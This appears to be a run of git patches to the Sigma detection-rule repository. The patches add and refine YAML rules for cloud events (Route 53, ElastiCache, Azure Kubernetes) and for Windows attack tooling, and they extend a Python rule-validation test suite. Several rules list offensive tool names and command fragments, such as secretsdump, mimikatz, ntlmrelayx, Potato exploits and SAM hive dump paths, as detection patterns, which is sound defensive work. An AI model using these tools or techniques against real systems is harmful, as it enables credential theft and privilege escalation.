943d78f363171b8aa0fa010dd47deb3b2ebca5b7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 07:57:37 -0500 Subject: [PATCH 0063/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- .../cloud/aws_route_53_domain_transferred_lock_disabled.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index f83864a5..971bb491 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -5,9 +5,9 @@ author: Elastic, Austin Songer status: experimental date: 2021/07/22 reference: - - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html + - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html logsource: service: cloudtrail detection: From 9d007027970c2e595427256c7876757dc501eee7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 07:57:55 -0500 Subject: [PATCH 0064/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 971bb491..648cad3b 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -4,7 +4,7 @@ description: Detects when a transfer lock was removed from a Route 53 domain. It author: Elastic, Austin Songer status: experimental date: 2021/07/22 -reference: +references: - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html From ada79fe05f57d28b3aa42789f7cd4ea0c7f1ce89 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 08:36:39 -0500 Subject: [PATCH 0065/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- .../aws_route_53_domain_transferred_to_another_account.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index 3ca1501f..a37bd58a 100644 --- a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml @@ -1,9 +1,10 @@ title: AWS Route 53 Domain Transferred to Another Account +id: b056de1a-6e6e-4e40-a67e-97c9808cf41b description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. author: Elastic, Austin Songer status: experimental date: 2021/07/22 -reference: +references: - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml logsource: service: cloudtrail From 880a87ce9129f8caef1fc1698d276a3a79f62a25 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 23 Jul 2021 18:33:38 +0200 Subject: [PATCH 0066/1367] fix: avoid false positives with MSF psexec rule --- ...n_metasploit_or_impacket_smb_psexec_service_install.yml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml index 833a1349..888c3dc9 100644 --- a/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/rules/windows/builtin/win_metasploit_or_impacket_smb_psexec_service_install.yml @@ -3,6 +3,7 @@ id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation author: Bartlomiej Czyz, Relativity date: 2021/01/21 +modified: 2021/07/23 action: global references: - https://bczyz1.github.io/2021/01/30/psexec.html @@ -14,8 +15,10 @@ tags: - attack.t1569.002 detection: selection_1: - ServiceFileName|re: '^.*\\[a-zA-Z]{8}\.exe$' + ServiceFileName|re: '^%systemroot%\\[a-zA-Z]{8}\.exe$' ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' + ServiceStartType: '3' # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697 + ServiceType: '0x10' filter: ServiceName: 'PSEXESVC' condition: selection and selection_1 and not filter @@ -26,7 +29,7 @@ fields: - ServiceName - ServiceFileName falsepositives: - - Highly unlikely + - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name level: high --- logsource: From ed049929055dd32dfbdf3246a2d38f290de67a81 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 23 Jul 2021 13:40:50 -0500 Subject: [PATCH 0067/1367] Update aws_route_53_domain_transferred_lock_disabled.yml --- rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml index 648cad3b..5f7ab706 100644 --- a/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml +++ b/rules/cloud/aws_route_53_domain_transferred_lock_disabled.yml @@ -16,6 +16,7 @@ detection: selection_eventname: - eventName: DisableDomainTransferLock condition: all of them +level: low tags: - attack.persistence - attack.credential_access From ffcd3a2112bac615b2296ff3d893f59d6adc2099 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 24 Jul 2021 09:41:04 +0200 Subject: [PATCH 0068/1367] Add test_optional_related test_optional_fields test_optional_falsepositives --- .../builtin/win_susp_eventlog_cleared.yml | 4 +- ...ingserver_execute_arbitrary_powershell.yml | 4 +- tests/test_rules.py | 73 ++++++++++++++++++- 3 files changed, 74 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 67693faa..e1e90819 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -2,8 +2,8 @@ action: global title: Eventlog Cleared id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - id: f2f01843-e7b8-4f95-a35a-d23584476423 - type: obsoletes + - id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 diff --git a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml index 0db7846b..5c67cda5 100644 --- a/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml +++ b/rules/windows/process_creation/process_creation_syncappvpublishingserver_execute_arbitrary_powershell.yml @@ -1,8 +1,8 @@ title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code id: fbd7c32d-db2a-4418-b92c-566eb8911133 related: - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: obsoletes + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: obsoletes status: experimental author: frack113 date: 2021/07/12 diff --git a/tests/test_rules.py b/tests/test_rules.py index 1e1cec92..cc8a9dab 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -252,6 +252,37 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'id' fields. Create an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).") + def test_optional_related(self): + faulty_rules = [] + valid_type = [ + "derived", + "obsoletes", + "merged", + "renamed", + ] + for file in self.yield_next_rule_file_path(self.path_to_rules): + related_lst = self.get_rule_part(file_path=file, part_name="related") + if related_lst: + # it exists but isn't a list + if not isinstance(related_lst, list): + print(Fore.YELLOW + "Rule {} has a 'related' field that isn't a list.".format(file)) + faulty_rules.append(file) + else: + # should probably test if we have only 'id' and 'type' ... + type_ok = True + for ref in related_lst: + id_str = ref['id'] + type_str = ref['type'] + if not type_str in valid_type: + type_ok = False + #Only add one time if many bad type in the same file + if type_ok == False: + print(Fore.YELLOW + "Rule {} has a 'related/type' invalid value.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'related' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_sysmon_rule_without_eventid(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): @@ -287,7 +318,7 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") - def test_date_modified(self): + def test_optional_date_modified(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): modifiedfield = self.get_rule_part(file_path=file, part_name="modified") @@ -304,7 +335,11 @@ class TestRules(unittest.TestCase): def test_optional_status(self): faulty_rules = [] - valid_status = ["stable","test","experimental"] + valid_status = [ + "stable", + "test", + "experimental", + ] for file in self.yield_next_rule_file_path(self.path_to_rules): status_str = self.get_rule_part(file_path=file, part_name="status") if status_str: @@ -317,7 +352,13 @@ class TestRules(unittest.TestCase): def test_level(self): faulty_rules = [] - valid_level = ["informational","low","medium","high","critical"] + valid_level = [ + "informational", + "low", + "medium", + "high", + "critical", + ] for file in self.yield_next_rule_file_path(self.path_to_rules): level_str = self.get_rule_part(file_path=file, part_name="level") if not level_str: @@ -330,6 +371,32 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_optional_fields(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + fields_str = self.get_rule_part(file_path=file, part_name="fields") + if fields_str: + # it exists but isn't a list + if not isinstance(fields_str, list): + print(Fore.YELLOW + "Rule {} has a 'fields' field that isn't a list.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'fields' fields. (has to be a list of values even if it contains only a single value)") + + def test_optional_falsepositives(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + falsepositives_str = self.get_rule_part(file_path=file, part_name="falsepositives") + if falsepositives_str: + # it exists but isn't a list + if not isinstance(falsepositives_str, list): + print(Fore.YELLOW + "Rule {} has a 'falsepositives' field that isn't a list.".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed optional 'falsepositives' fields. (has to be a list of values even if it contains only a single value)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From 07223baaebed2d5c894ba2c503fd43b3e6dcb253 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 10:22:07 +0200 Subject: [PATCH 0069/1367] fix: typo in date value --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index 46461579..fa6e4b36 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -3,7 +3,7 @@ id: 6ea858a8-ba71-4a12-b2cc-5d83312404c7 status: experimental description: Detects files written by the different tools that exploit HiveNightmare author: Florian Roth -date: 2020/07/23 +date: 2021/07/23 references: - https://github.com/GossiTheDog/HiveNightmare - https://github.com/FireFart/hivenightmare/ From 3eb37c014c3f1ec01cd2a84a28321c5a5509a49c Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 11:08:35 +0200 Subject: [PATCH 0070/1367] rule: Impacket tools and Relay attack tools --- .../win_impacket_compiled_tools.yml | 71 +++++++++++++++++++ .../win_tools_relay_attacks.yml | 44 ++++++++++++ 2 files changed, 115 insertions(+) create mode 100644 rules/windows/process_creation/win_impacket_compiled_tools.yml create mode 100644 rules/windows/process_creation/win_tools_relay_attacks.yml diff --git a/rules/windows/process_creation/win_impacket_compiled_tools.yml b/rules/windows/process_creation/win_impacket_compiled_tools.yml new file mode 100644 index 00000000..d31c4270 --- /dev/null +++ b/rules/windows/process_creation/win_impacket_compiled_tools.yml @@ -0,0 +1,71 @@ +title: Impacket Tool Execution +id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 +description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) +author: Florian Roth +date: 2021/07/24 +references: + - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries +tags: + - attack.execution + - attack.t1557.001 +logsource: + category: process_creation + product: windows +detection: + selection: + - Image|contains: + - '\goldenPac' + - '\karmaSMB' + - '\kintercept' + - '\ntlmrelayx' + - '\rpcdump' + - '\samrdump' + - '\secretsdump' + - '\smbexec' + - '\smbrelayx' + - '\wmiexec' + - '\wmipersist' + - Image|endswith: + # - '\addcomputer_windows.exe' + - '\atexec_windows.exe' + - '\dcomexec_windows.exe' + - '\dpapi_windows.exe' + # - '\esentutl_windows.exe' + - '\findDelegation_windows.exe' + - '\GetADUsers_windows.exe' + # - '\getArch_windows.exe' + - '\GetNPUsers_windows.exe' + - '\getPac_windows.exe' + - '\getST_windows.exe' + - '\getTGT_windows.exe' + - '\GetUserSPNs_windows.exe' + - '\ifmap_windows.exe' + # - '\lookupsid_windows.exe' + - '\mimikatz_windows.exe' + # - '\mqtt_check_windows.exe' + # - '\mssqlclient_windows.exe' + # - '\mssqlinstance_windows.exe' + - '\netview_windows.exe' + - '\nmapAnswerMachine_windows.exe' + #- '\ntfs-read_windows.exe' + - '\opdump_windows.exe' + # - '\ping6_windows.exe' + # - '\ping_windows.exe' + - '\psexec_windows.exe' + # - '\raiseChild_windows.exe' + - '\rdp_check_windows.exe' + #- '\registry-read_windows.exe' + #- '\reg_windows.exe' + - '\sambaPipe_windows.exe' + # - '\services_windows.exe' + - '\smbclient_windows.exe' + - '\smbserver_windows.exe' + - '\sniffer_windows.exe' + - '\sniff_windows.exe' + - '\split_windows.exe' + - '\ticketer_windows.exe' + # - '\wmiquery_windows.exe' + condition: selection +falsepositives: + - Legitimate use of the impacket tools +level: high diff --git a/rules/windows/process_creation/win_tools_relay_attacks.yml b/rules/windows/process_creation/win_tools_relay_attacks.yml new file mode 100644 index 00000000..9b435d13 --- /dev/null +++ b/rules/windows/process_creation/win_tools_relay_attacks.yml @@ -0,0 +1,44 @@ +title: SMB Relay Attack Tools +id: 5589ab4f-a767-433c-961d-c91f3f704db1 +description: Detects different hacktools used for relay attacks on Windows for privilege escalation +author: Florian Roth +date: 2021/07/24 +references: + - https://attack.mitre.org/techniques/T1557/001/ + - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ + - https://pentestlab.blog/2017/04/13/hot-potato/ + - https://github.com/ohpe/juicy-potato + - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes + - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire +tags: + - attack.execution + - attack.t1557.001 +logsource: + category: process_creation + product: windows +detection: + selection_pe: + Image|contains: + - 'PetitPotam' + - 'RottenPotato' + - 'HotPotato' + - 'JuicyPotato' + - '\just_dce_' + - 'Juicy Potato' + - '\temp\rot.exe' + - '\Potato.exe' + - '\SpoolSample.exe' + - '\Responder.exe' + - '\smbrelayx' + - '\ntlmrelayx' + selection_script: + CommandLine|contains: + - 'Invoke-Tater' + - ' smbrelay' + - ' ntlmrelay' + - 'cme smb ' + - ' /ntlm:NTLMhash ' + condition: selection_pe or selection_script +falsepositives: + - Legitimate files with these rare hacktool names +level: critical From ae80f747aed11a9247c282ac7b999f370a54a650 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 12:34:33 +0200 Subject: [PATCH 0071/1367] fix: adding experimental status --- rules/windows/process_creation/win_impacket_compiled_tools.yml | 1 + rules/windows/process_creation/win_tools_relay_attacks.yml | 1 + 2 files changed, 2 insertions(+) diff --git a/rules/windows/process_creation/win_impacket_compiled_tools.yml b/rules/windows/process_creation/win_impacket_compiled_tools.yml index d31c4270..9eb0aefd 100644 --- a/rules/windows/process_creation/win_impacket_compiled_tools.yml +++ b/rules/windows/process_creation/win_impacket_compiled_tools.yml @@ -1,4 +1,5 @@ title: Impacket Tool Execution +status: experimental id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) author: Florian Roth diff --git a/rules/windows/process_creation/win_tools_relay_attacks.yml b/rules/windows/process_creation/win_tools_relay_attacks.yml index 9b435d13..89ce6ef1 100644 --- a/rules/windows/process_creation/win_tools_relay_attacks.yml +++ b/rules/windows/process_creation/win_tools_relay_attacks.yml @@ -1,4 +1,5 @@ title: SMB Relay Attack Tools +status: experimental id: 5589ab4f-a767-433c-961d-c91f3f704db1 description: Detects different hacktools used for relay attacks on Windows for privilege escalation author: Florian Roth From 9771943116378adfa7a1801d3df47b6a96afa970 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 24 Jul 2021 16:13:36 +0200 Subject: [PATCH 0072/1367] refactor: new file pattern SeriousSAM --- rules/windows/file_event/win_hivenightmare_file_exports.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/file_event/win_hivenightmare_file_exports.yml b/rules/windows/file_event/win_hivenightmare_file_exports.yml index fa6e4b36..42bb5ee0 100644 --- a/rules/windows/file_event/win_hivenightmare_file_exports.yml +++ b/rules/windows/file_event/win_hivenightmare_file_exports.yml @@ -8,6 +8,7 @@ references: - https://github.com/GossiTheDog/HiveNightmare - https://github.com/FireFart/hivenightmare/ - https://github.com/WiredPulse/Invoke-HiveNightmare + - https://twitter.com/cube0x0/status/1418920190759378944 logsource: product: windows category: file_event @@ -17,12 +18,14 @@ tags: - attack.t1552.001 detection: selection: - TargetFilename|contains: + - TargetFilename|contains: - '\hive_sam_' # Go version - '\SAM-2021-' # C++ version - '\SAM-2022-' # C++ version - '\SAM-haxx' # Early C++ versions - '\Sam.save' # PowerShell version + - TargetFilename: + - 'C:\windows\temp\sam' condition: selection fields: - CommandLine From e5edd03ff38d4eaa3efb363678f9fdb23c78df90 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:16:11 -0500 Subject: [PATCH 0073/1367] Create aws_elasticache_security_group_created.yml --- ...aws_elasticache_security_group_created.yml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 rules/cloud/aws_elasticache_security_group_created.yml diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws_elasticache_security_group_created.yml new file mode 100644 index 00000000..494774ea --- /dev/null +++ b/rules/cloud/aws_elasticache_security_group_created.yml @@ -0,0 +1,25 @@ +title: AWS ElastiCache Security Group Created +id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 +description: Detects when an ElastiCache security group has been created. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: elasticache.amazonaws.com + selection_eventname: + - eventName: "Create Cache Security Group" + condition: all of them +level: low +tags: + - attack.persistence + - attack.t1136 + - attack.t1136.003 +falsepositives: +- A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + From 8816cb3345bc154567cbe19f0c4965fc06716127 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:23:25 -0500 Subject: [PATCH 0074/1367] Create aws_elasticache_security_group_modified_or_deleted.yml --- ...che_security_group_modified_or_deleted.yml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml new file mode 100644 index 00000000..80f9578b --- /dev/null +++ b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml @@ -0,0 +1,32 @@ +title: AWS ElastiCache Security Group Modified or Deleted +id: 7c797da2-9cf2-4523-ba64-33b06339f0cc +description: Identifies when an ElastiCache security group has been modified or deleted. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: elasticache.amazonaws.com + selection_eventname1: + - eventName: "Delete Cache Security Group" + selection_eventname2: + - eventName: "Authorize Cache Security Group Ingress" + selection_eventname3: + - eventName: "Revoke Cache Security Group Ingress" + selection_eventname4: + - eventName: "AuthorizeCacheSecurityGroupEgress" + selection_eventname5: + - eventName: "RevokeCacheSecurityGroupEgress" + condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 +level: low +tags: + - attack.impact + - attack.t1531 +falsepositives: +- A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + From 5d3b687ce4e84c7c6b8162dcf82b62d43be73a6c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:34:08 -0500 Subject: [PATCH 0075/1367] Update aws_elasticache_security_group_created.yml --- rules/cloud/aws_elasticache_security_group_created.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws_elasticache_security_group_created.yml b/rules/cloud/aws_elasticache_security_group_created.yml index 494774ea..c0df4df4 100644 --- a/rules/cloud/aws_elasticache_security_group_created.yml +++ b/rules/cloud/aws_elasticache_security_group_created.yml @@ -18,7 +18,7 @@ level: low tags: - attack.persistence - attack.t1136 - - attack.t1136.003 + - attack.t1136.003 falsepositives: - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 55a2af475be01eaf039306bb9bdf4489a271eaae Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 09:35:05 -0500 Subject: [PATCH 0076/1367] Update aws_elasticache_security_group_modified_or_deleted.yml --- .../aws_elasticache_security_group_modified_or_deleted.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml index 80f9578b..eab2a71a 100644 --- a/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml +++ b/rules/cloud/aws_elasticache_security_group_modified_or_deleted.yml @@ -16,11 +16,11 @@ detection: selection_eventname2: - eventName: "Authorize Cache Security Group Ingress" selection_eventname3: - - eventName: "Revoke Cache Security Group Ingress" + - eventName: "Revoke Cache Security Group Ingress" selection_eventname4: - - eventName: "AuthorizeCacheSecurityGroupEgress" + - eventName: "AuthorizeCacheSecurityGroupEgress" selection_eventname5: - - eventName: "RevokeCacheSecurityGroupEgress" + - eventName: "RevokeCacheSecurityGroupEgress" condition: selection_source and selection_eventname1 or selection_eventname2 or selection_eventname3 or selection_eventname4 or selection_eventname5 level: low tags: From 7c6b13936d6909b72f2d06a8f52e15d87951b9fe Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:20:11 -0500 Subject: [PATCH 0077/1367] Create azure_kubernetes_events_deleted.yml --- .../cloud/azure_kubernetes_events_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_events_deleted.yml diff --git a/rules/cloud/azure_kubernetes_events_deleted.yml b/rules/cloud/azure_kubernetes_events_deleted.yml new file mode 100644 index 00000000..aa209c99 --- /dev/null +++ b/rules/cloud/azure_kubernetes_events_deleted.yml @@ -0,0 +1,24 @@ +title: Azure Kubernetes Events Deleted +id: 225d8b09-e714-479c-a0e4-55e6f29adf35 +description: Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +logsource: + service: azure.activitylogs +detection: + selection_operationname: + - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EVENTS.K8S.IO/EVENTS/DELETE + status: success + condition: all of them +level: medium +tags: + - attack.defense_evasion + - attack.t1562 + - attack.t1562.001 +falsepositives: +- Events deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + From 046053644491653edf4e978f0cf592072b087ce0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:24:29 -0500 Subject: [PATCH 0078/1367] Create azure_kubernetes_pods_delete.yml --- rules/cloud/azure_kubernetes_pods_delete.yml | 21 ++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_pods_delete.yml diff --git a/rules/cloud/azure_kubernetes_pods_delete.yml b/rules/cloud/azure_kubernetes_pods_delete.yml new file mode 100644 index 00000000..a4d8a5bb --- /dev/null +++ b/rules/cloud/azure_kubernetes_pods_delete.yml @@ -0,0 +1,21 @@ +title: Azure Kubernetes Pods Deleted +id: b02f9591-12c3-4965-986a-88028629b2e1 +description: Identifies the deletion of Azure Kubernetes Pods. +author: Austin Songer +status: experimental +date: 2021/07/24 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml +logsource: + service: azure.activitylogs +detection: + selection_operation_name: + - properties.message: MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE + status: success + condition: all of them +level: medium +tags: + - attack.impact +falsepositives: +- Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From c366ae4b2a5078bfd008313889d0b5f5360aec6c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:25:37 -0500 Subject: [PATCH 0079/1367] Update azure_kubernetes_pods_delete.yml --- rules/cloud/azure_kubernetes_pods_delete.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure_kubernetes_pods_delete.yml b/rules/cloud/azure_kubernetes_pods_delete.yml index a4d8a5bb..86097c0b 100644 --- a/rules/cloud/azure_kubernetes_pods_delete.yml +++ b/rules/cloud/azure_kubernetes_pods_delete.yml @@ -6,7 +6,7 @@ status: experimental date: 2021/07/24 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml + - https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml logsource: service: azure.activitylogs detection: From 5fc36eb8d6f7e6c70ba4c72e506082122e2aa33f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 2021 10:25:51 -0500 Subject: [PATCH 0080/1367] Rename azure_kubernetes_pods_delete.yml to azure_kubernetes_pods_deleted.yml --- ...bernetes_pods_delete.yml => azure_kubernetes_pods_deleted.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/{azure_kubernetes_pods_delete.yml => azure_kubernetes_pods_deleted.yml} (100%) diff --git a/rules/cloud/azure_kubernetes_pods_delete.yml b/rules/cloud/azure_kubernetes_pods_deleted.yml similarity index 100% rename from rules/cloud/azure_kubernetes_pods_delete.yml rename to rules/cloud/azure_kubernetes_pods_deleted.yml From ef64e2a02f14ed43e9544b5a96301d01bbf99898 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 24 Jul 